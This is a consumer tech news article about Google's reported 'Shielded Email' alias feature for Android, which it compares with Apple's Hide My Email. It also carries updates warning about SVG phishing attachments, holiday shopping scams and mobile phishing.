Updated on November 18 with a new email threat warning as malicious image attachments are found evading existing security measures, and a law enforcement alert for dangerous email links as the holiday season approaches.
Google’s ongoing campaign to narrow the security and privacy gap between Android and iPhone, as well as the wider Google and Apple ecosystems has just taken its latest twist. For 2 billion Gmail users, this could completely change how you use email.
Apple’s Hide My Email feature lets users keep their personal email addresses private, away from the information brokers who sell lists of email addresses and phone numbers that drive the global scourge of spam and cold calling.
Now it seems Google has decided to follow suit—a surprise decision no-one saw coming and which was not touted with the other privacy and security updates this year. Per Android Authority, “sure, Gmail is an absolute champ at filtering out spam, but every time you share your email with someone even a little bit shady, do you feel like you’re playing with fire and risking a whole bunch of unwanted contact? Google may just have a solution in the works, at least by the looks of our latest teardown.”
“With Hide My Email,” Apple explains, “you can generate unique, random email addresses that forward to your personal email account, so you don’t have to share your real email address when filling out forms or signing up for newsletters on the web, or when sending email.”
While this enables users to forward these ghost email addresses to any email address associated with their iCloud account, it really comes into its own when used with Apple’s own Mail and Safari apps. This allows you to send messages directly from those shielded addresses, and also offers the option to easily create a ghost email address whenever you’re asked for an email address within a form on Safari.
Tearing down the new 24.45.33 APK release of Google Play Services, “and upon cracking it open,” the website explains it has found “a whole boatload of strings referencing and in support of something called ‘Shielded Email’.”
This system “to create single-use or limited-use email aliases that will forward messages along to your primary account.” And while “we could imagine that something like this might be pretty useful in Chrome,” which would mirror Apple’s approach, this current reveal is focused instead on “specifically addressing apps that ask for your email address,” which is why it’s been found in a Play update.
Again, just as with Apple and iPhone, while this likely won’t be restricted to Gmail, Google will only have full control over its functionality and the use of such shielded emails where it controls the email platform itself, which does mean Gmail.
This is a laudable move on Google’s part, and if it catches on as Apple’s Hide My Email has done, then it is a huge improvement for Android users, most of which will have one or more Gmail addresses associated with their accounts.
As noted by 9to5Google, “the experience looks to be integrated with Android’s autofill and presumably the Google Password Manager… It remains to be seen whether Google will charge for Shielded Email. Besides encouraging people to sign-up for Google One, making it paid could be a way to make sure functionality isn’t abused.”
Coming on the back of live threat detection and spam call warnings, it’s clear that the security and privacy gap is now narrowing. The only question for Android users remains how fast these updates rollout, and which device OEMs will get them. But given what we’ve seen already this week, it’s likely this new update will come to Pixels first, another concern for Samsung users currently in the queue for new features.
For now, unlike Apple’s alternative this leaked update appears mobile only—this is for Android users and there’s no news as yet as to whether this will make its way into desktop Gmail and other Google services accessed via Chrome. But once this is available, it would make sense to mimic the application of Apple’s Hide My Email across the full Google/Gmail ecosystem, not just apps.
There are also third-party apps that do the same, whether that’s one-time cloaked email addresses or a universal email address for use on websites and other services where you fear scam or you’re details making their way onto nefarious lists
The two key benefits of using cloaked email addresses are to immediately identify scams as you will know where your email address was harvested and can filter those emails straight into the trash, and to prevent cross-contamination through attackers having your real email addresses which is also likely a login to sites and services.
The increasing tradecraft of phishing emails has just been highlighted, with Bleeping Computer reporting that “threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. Most images on the web are JPG or PNG files, which are made of grids of tiny squares called pixels. Each pixel has a specific color value, and together, these pixels form the entire image. SVG, or Scalable Vector Graphics, displays images differently, as instead of using pixels, the images are created through lines, shapes, and text described in textual mathematical formulas in the code.”
The point of using such tactics is both to evade automated detection on phones and computers, but also to better trick users into clicking where they shouldn’t or completing forms designed to steal personally identifiable information or financial information as quickly as possible, before suspicions are raised.
“Other SVG attachments used in a recent campaign,” Bleeping Computer says, “pretend to be official documents or requests for more information, prompting you to click the download button, which then downloads malware from a remote site.”
We are now entering the holiday season, which is a scammer’s paradise and we have already seen multiple warnings that malicious websites and manipulated search results are waiting to lure victims. All of these sites will pull traffic from social media, messaging apps, phishing emails or search engine poisoning.
UK law enforcement has just warned shoppers “to exercise vigilance against any tactics that push them to act quickly without thinking, warning that criminals often create false urgency by using limited-time offers or promoting items that seem scarce or not widely available.”
Again—remember the lure. Putting SEO poisoning aside, which is itself a growing threat, the reality is that falling victim is all in the hook. Your best chance to stop an attack before falling victim is to spot the initial approach.
“Our message to anyone shopping online as we approach Black Friday is simple,” the UK’s cybersecurity agency warns. “If you come across anything that doesn’t feel right – stop what you’re doing, break contact, and do not click any links.”
The reality is that email remains a rudimentary technology when compared to other platforms, and it’s all too easy for an attacker to blast out a malicious campaign to tens of thousands of victims at a time. Our email clients are still not good at detecting such attacks, especially on small mobile screens which mask much of the information that mighty arouse suspicion on a larger device.
And so, the fact this new Google offering is mobile only for now is unsurprising—your mobile device is fast becoming the largest threat to your data security and privacy, which extends to your work if you bring your device into the office or connect to company systems as most of us now do.
Zimperium’s Nico Chiaraviglio has just warned of “a strategic evolution in mobile security – evasive cyberattacks are now the new normal, as cybercriminals are becoming more sophisticated in their mobile phishing attacks.” This is clear in the weekly reports of new mobile malware campaigns. Almost all such attacks begin within phishing lures, which come via social media messaging apps or email.
Chiaraviglio now predicts that by next year ‘mishing,’ or mobile phishing, attacks “will become so sophisticated and evasive that modern tooling won’t be able to detect it. We will see the rise of AI-driven mobile malware capable of mimicking user behavior, making it far harder to detect using traditional methods.” Not only is the mobile phone central to this treat, but Android is more vulnerable than iPhone, making defenses on Google’s platform more critical.
Bottom line—when this new Gmail email cloaking makes it onto your device—and clearly there’s no confirmation on timing as yet, make sure you use it.
